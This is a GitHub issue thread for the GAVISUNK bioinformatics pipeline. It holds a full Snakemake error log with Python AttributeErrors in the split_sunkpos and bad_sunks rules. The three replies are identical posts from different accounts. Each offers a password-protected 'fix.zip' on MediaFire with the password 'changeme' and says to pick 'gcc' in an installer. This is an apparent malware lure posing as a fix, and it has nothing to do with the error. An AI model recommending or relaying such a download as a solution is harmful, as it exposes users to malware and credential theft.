### ISSUE TITLE
Getting error in Gavisunk after 53%

### ISSUE THREAD

**Issue by Ashu2195** [pdishuck/GAVISUNK#15]
(ashu_conda) morpheus@morpheus-OptiPlex-5050:/media/morpheus/sagar/kadak_part2/GAVISUNK$ snakemake -R --use-conda --cores 8 --configfile .test/config.yaml --resources load=1000
Config file config/config.yaml is extended by additional config specified via the command line.
Multiple includes of /media/morpheus/sagar/kadak_part2/GAVISUNK/workflow/rules/gatherSplits.smk ignored
Detailed plot mode active
Building DAG of jobs...
Your conda installation is not configured to use strict channel priorities. This is however crucial for having robust and correct environments (for details, see https://conda-forge.org/docs/user/tipsandtricks.html). Please consider to configure strict priorities by executing 'conda config --set channel_priority strict'.
Using shell: /usr/bin/bash
Provided cores: 8
Rules claiming more threads will be scaled down.
Provided resources: load=1000
Job stats:
job                         count    min threads    max threads
------------------------  -------  -------------  -------------
SUNK_annot                     20              2              2
all                             1              1              1
bad_sunks                       2              1              1
bed_convert                     1              2              2
combine_ont                     2              1              1
combine_ont_nofilt              2              1              1
confirm_out                     4              1              1
covprob                         4              2              2
define_SUNKs                    1              8              8
diag_filter_final              20              1              1
diag_filter_step               20              1              1
gather_process_by_contig        4              1              1
get_gaps                        2              1              1
mrsfast_search                  1              8              8
slop_gaps                       4              1              1
split_sunkpos                   4              1              1
viz_contigs                     7              2              2
viz_contigs_detailed            4              2              2
total                         103              1              8

Select jobs to execute...

[Mon Aug 26 06:49:07 2024]
rule bad_sunks:
    input: .test/data/HG02723/h1.fa.fai, .test/data/HG02723/h2.fa.fai, results/AMY_HG02723/sunkpos/hap1.sunkpos, results/AMY_HG02723/sunkpos/hap2.sunkpos
    output: results/AMY_HG02723/sunkpos/bad_sunks.txt
    log: logs/AMY_HG02723/bad_sunks.log
    jobid: 182
    reason: Missing output files: results/AMY_HG02723/sunkpos/bad_sunks.txt
    wildcards: sample=AMY_HG02723
    resources: tmpdir=/tmp, mem=10, load=100

[Mon Aug 26 06:49:07 2024]
checkpoint split_sunkpos:
    input: results/AMY_HG02723/sunkpos/hap1.sunkpos, results/AMY_HG02723/mrsfast/kmer.loc
    output: results/AMY_HG02723/breaks/hap1_splits_pos.done
    log: logs/AMY_HG02723/hap1_split_sunkpos.log
    jobid: 185
    reason: Missing output files: results/AMY_HG02723/breaks/hap1_splits_pos.done
    wildcards: sample=AMY_HG02723, hap=hap1
    resources: tmpdir=/tmp, mem=10, load=100
DAG of jobs will be updated after completion.

Activating conda environment: .snakemake/conda/b625e9f9eaa1fbd96845de5c623ece07_

[Mon Aug 26 06:49:07 2024]
checkpoint split_sunkpos:
    input: results/AMY_HG02723/sunkpos/hap2.sunkpos, results/AMY_HG02723/mrsfast/kmer.loc
    output: results/AMY_HG02723/breaks/hap2_splits_pos.done
    log: logs/AMY_HG02723/hap2_split_sunkpos.log
    jobid: 186
    reason: Missing output files: results/AMY_HG02723/breaks/hap2_splits_pos.done
    wildcards: sample=AMY_HG02723, hap=hap2
    resources: tmpdir=/tmp, mem=10, load=100
DAG of jobs will be updated after completion.

Activating conda environment: .snakemake/conda/b625e9f9eaa1fbd96845de5c623ece07_
Activating conda environment: .snakemake/conda/b625e9f9eaa1fbd96845de5c623ece07_
Activating conda environment: .snakemake/conda/b625e9f9eaa1fbd96845de5c623ece07_
Activating conda environment: .snakemake/conda/b625e9f9eaa1fbd96845de5c623ece07_
Traceback (most recent call last):
  File "/media/morpheus/sagar/kadak_part2/GAVISUNK/.snakemake/scripts/tmp7wfbdjao.split_locs.py", line 25, in <module>
    output_complete = splitlocs(snakemake.wildcards.hap,group_ONT, dir_name,"sunkpos")
  File "/media/morpheus/sagar/kadak_part2/GAVISUNK/.snakemake/scripts/tmp7wfbdjao.split_locs.py", line 11, in splitlocs
    contig_name = name.replace("#", "_")
AttributeError: 'tuple' object has no attribute 'replace'
[Mon Aug 26 06:49:08 2024]
Error in rule split_sunkpos:
    jobid: 185
    input: results/AMY_HG02723/sunkpos/hap1.sunkpos, results/AMY_HG02723/mrsfast/kmer.loc
    output: results/AMY_HG02723/breaks/hap1_splits_pos.done
    log: logs/AMY_HG02723/hap1_split_sunkpos.log (check log file(s) for error details)
    conda-env: /media/morpheus/sagar/kadak_part2/GAVISUNK/.snakemake/conda/b625e9f9eaa1fbd96845de5c623ece07_

RuleException:
CalledProcessError in file /media/morpheus/sagar/kadak_part2/GAVISUNK/workflow/rules/tagONT.smk, line 168:
Command 'source /home/morpheus/anaconda3/envs/ashu_conda/bin/activate '/media/morpheus/sagar/kadak_part2/GAVISUNK/.snakemake/conda/b625e9f9eaa1fbd96845de5c623ece07_'; set -euo pipefail;  python /media/morpheus/sagar/kadak_part2/GAVISUNK/.snakemake/scripts/tmp7wfbdjao.split_locs.py' returned non-zero exit status 1.
  File "/media/morpheus/sagar/kadak_part2/GAVISUNK/workflow/rules/tagONT.smk", line 168, in __rule_split_sunkpos
  File "/home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/concurrent/futures/thread.py", line 58, in run
/home/morpheus/.local/lib/python3.8/site-packages/scipy/__init__.py:146: UserWarning: A NumPy version >=1.16.5 and <1.23.0 is required for this version of SciPy (detected version 1.24.4
  warnings.warn(f"A NumPy version >={np_minversion} and <{np_maxversion}"
Traceback (most recent call last):
  File "/media/morpheus/sagar/kadak_part2/GAVISUNK/.snakemake/scripts/tmpr5hh9npu.split_locs.py", line 25, in <module>
    output_complete = splitlocs(snakemake.wildcards.hap,group_ONT, dir_name,"sunkpos")
  File "/media/morpheus/sagar/kadak_part2/GAVISUNK/.snakemake/scripts/tmpr5hh9npu.split_locs.py", line 11, in splitlocs
    contig_name = name.replace("#", "_")
AttributeError: 'tuple' object has no attribute 'replace'
Traceback (most recent call last):
  File "workflow/scripts/badsunks_AR.py", line 105, in <module>
    main()
  File "workflow/scripts/badsunks_AR.py", line 29, in main
    kmer_counts2[['contig','ID']] =  kmer_counts2.ID2.str.split(":",1,expand=True)
  File "/home/morpheus/.local/lib/python3.8/site-packages/pandas/core/generic.py", line 5989, in __getattr__
    return object.__getattribute__(self, name)
AttributeError: 'DataFrame' object has no attribute 'ID2'
[Mon Aug 26 06:49:09 2024]
Error in rule split_sunkpos:
    jobid: 186
    input: results/AMY_HG02723/sunkpos/hap2.sunkpos, results/AMY_HG02723/mrsfast/kmer.loc
    output: results/AMY_HG02723/breaks/hap2_splits_pos.done
    log: logs/AMY_HG02723/hap2_split_sunkpos.log (check log file(s) for error details)
    conda-env: /media/morpheus/sagar/kadak_part2/GAVISUNK/.snakemake/conda/b625e9f9eaa1fbd96845de5c623ece07_

RuleException:
CalledProcessError in file /media/morpheus/sagar/kadak_part2/GAVISUNK/workflow/rules/tagONT.smk, line 168:
Command 'source /home/morpheus/anaconda3/envs/ashu_conda/bin/activate '/media/morpheus/sagar/kadak_part2/GAVISUNK/.snakemake/conda/b625e9f9eaa1fbd96845de5c623ece07_'; set -euo pipefail;  python /media/morpheus/sagar/kadak_part2/GAVISUNK/.snakemake/scripts/tmpr5hh9npu.split_locs.py' returned non-zero exit status 1.
  File "/media/morpheus/sagar/kadak_part2/GAVISUNK/workflow/rules/tagONT.smk", line 168, in __rule_split_sunkpos
  File "/home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/concurrent/futures/thread.py", line 58, in run
[Mon Aug 26 06:49:09 2024]
Error in rule bad_sunks:
    jobid: 182
    input: .test/data/HG02723/h1.fa.fai, .test/data/HG02723/h2.fa.fai, results/AMY_HG02723/sunkpos/hap1.sunkpos, results/AMY_HG02723/sunkpos/hap2.sunkpos
    output: results/AMY_HG02723/sunkpos/bad_sunks.txt
    log: logs/AMY_HG02723/bad_sunks.log (check log file(s) for error details)
    conda-env: /media/morpheus/sagar/kadak_part2/GAVISUNK/.snakemake/conda/b625e9f9eaa1fbd96845de5c623ece07_
    shell:
        
    python workflow/scripts/badsunks_AR.py .test/data/HG02723/h1.fa.fai .test/data/HG02723/h2.fa.fai results/AMY_HG02723/sunkpos/hap1.sunkpos results/AMY_HG02723/sunkpos/hap2.sunkpos results/AMY_HG02723/sunkpos/bad_sunks.txt
    
        (one of the commands exited with non-zero exit code; note that snakemake uses bash strict mode!)

Shutting down, this might take some time.
Exiting because a job execution failed. Look above for error message
Complete log: .snakemake/log/2024-08-26T064902.169428.snakemake.log

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
